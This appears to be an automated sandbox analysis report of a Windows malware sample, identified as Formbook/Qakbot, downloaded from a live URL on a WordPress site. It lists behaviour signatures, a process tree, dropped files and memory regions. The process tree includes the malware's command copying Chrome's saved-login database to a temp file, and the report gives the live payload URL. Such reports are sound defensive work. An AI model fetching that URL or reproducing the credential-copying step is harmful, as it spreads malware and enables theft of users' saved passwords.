Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    07-07-2020 00:47

General

  • Target

    http://www.kyrosmaritime.com/wp-admin/new%20crypt.exe

  • Sample

    200707-3dd9rxm2js

Malware Config

Signatures

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Executes dropped EXE 2 IoCs
  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

  • Adds Run entry to start application 2 TTPs 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Checks whether UAC is enabled 2 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Modifies Internet Explorer settings 1 TTPs 54 IoCs
  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Drops file in Program Files directory 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Modifies system certificate store 8 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.kyrosmaritime.com/wp-admin/new%20crypt.exe
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Checks whether UAC is enabled
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      • Suspicious use of FindShellTrayWindow
      • Modifies system certificate store
      PID:3588
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3588 CREDAT:82945 /prefetch:2
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Checks whether UAC is enabled
        • Modifies Internet Explorer settings
        PID:3856
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe
        "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        PID:1908
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe
          "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          PID:2964
    • C:\Windows\SysWOW64\autoconv.exe
      "C:\Windows\SysWOW64\autoconv.exe"
      2⤵
        PID:3980
      • C:\Windows\SysWOW64\autoconv.exe
        "C:\Windows\SysWOW64\autoconv.exe"
        2⤵
          PID:1864
        • C:\Windows\SysWOW64\autoconv.exe
          "C:\Windows\SysWOW64\autoconv.exe"
          2⤵
            PID:3984
          • C:\Windows\SysWOW64\autoconv.exe
            "C:\Windows\SysWOW64\autoconv.exe"
            2⤵
              PID:3436
            • C:\Windows\SysWOW64\autoconv.exe
              "C:\Windows\SysWOW64\autoconv.exe"
              2⤵
                PID:2828
              • C:\Windows\SysWOW64\autoconv.exe
                "C:\Windows\SysWOW64\autoconv.exe"
                2⤵
                  PID:736
                • C:\Windows\SysWOW64\netsh.exe
                  "C:\Windows\SysWOW64\netsh.exe"
                  2⤵
                  • Adds Run entry to start application
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of AdjustPrivilegeToken
                  • Modifies Internet Explorer settings
                  • Drops file in Program Files directory
                  • Suspicious use of WriteProcessMemory
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3992
                  • C:\Windows\SysWOW64\cmd.exe
                    /c del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe"
                    3⤵
                      PID:2644
                    • C:\Windows\SysWOW64\cmd.exe
                      /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
                      3⤵
                        PID:2184
                      • C:\Program Files\Mozilla Firefox\Firefox.exe
                        "C:\Program Files\Mozilla Firefox\Firefox.exe"
                        3⤵
                          PID:740

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe.i9fdrx5.partial

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\2QUNAUWS.cookie

                    • C:\Users\Admin\AppData\Local\Temp\DB1

                    • C:\Users\Admin\AppData\Roaming\057903T3\057logim.jpeg

                    • C:\Users\Admin\AppData\Roaming\057903T3\057logrf.ini

                    • C:\Users\Admin\AppData\Roaming\057903T3\057logrg.ini

                    • C:\Users\Admin\AppData\Roaming\057903T3\057logri.ini

                    • C:\Users\Admin\AppData\Roaming\057903T3\057logrv.ini

                    • memory/740-22-0x0000000000000000-mapping.dmp

                    • memory/740-23-0x00007FF73E940000-0x00007FF73E9D3000-memory.dmp

                      Filesize

                      588KB

                    • memory/740-25-0x00007FF73E940000-0x00007FF73E9D3000-memory.dmp

                      Filesize

                      588KB

                    • memory/740-24-0x00007FF73E940000-0x00007FF73E9D3000-memory.dmp

                      Filesize

                      588KB

                    • memory/1908-2-0x0000000000000000-mapping.dmp

                    • memory/2184-19-0x0000000000000000-mapping.dmp

                    • memory/2644-10-0x0000000000000000-mapping.dmp

                    • memory/2964-5-0x000000000041E200-mapping.dmp

                    • memory/2964-4-0x0000000000400000-0x000000000042D000-memory.dmp

                      Filesize

                      180KB

                    • memory/3588-15-0x000001E3683D1000-0x000001E368414000-memory.dmp

                      Filesize

                      268KB

                    • memory/3856-17-0x00000000000000B8-mapping.dmp

                    • memory/3856-0-0x0000000000000000-mapping.dmp

                    • memory/3992-21-0x0000000006960000-0x0000000006ADC000-memory.dmp

                      Filesize

                      1.5MB

                    • memory/3992-16-0x0000000005CD0000-0x0000000005E23000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/3992-14-0x0000000005CD0000-0x0000000005E23000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/3992-9-0x00000000010E0000-0x00000000010FE000-memory.dmp

                      Filesize

                      120KB

                    • memory/3992-8-0x00000000010E0000-0x00000000010FE000-memory.dmp

                      Filesize

                      120KB

                    • memory/3992-7-0x0000000000000000-mapping.dmp